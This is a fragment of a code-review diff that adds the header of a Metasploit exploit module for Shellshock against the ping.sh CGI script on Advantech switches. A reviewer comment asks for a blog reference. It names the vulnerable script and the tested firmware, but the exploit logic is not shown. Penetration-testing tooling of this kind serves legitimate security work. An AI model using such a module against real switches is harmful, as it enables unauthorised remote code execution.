modules/exploits/linux/advantech_switch_bash_env_exec.rb

```diff
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
+      'Description' => %q{
+        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
+        handles external environment variables. This module targets the 'ping.sh' CGI
+        script, acessible through the Boa web server on Advantech switches. This module
+        was tested against firmware version 1322_D1.98.
+      },
+      'Author' => 'hdm',
+      'References' => [
```

Comment:
@jlee-r7 when landing can you add a reference to https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities plz?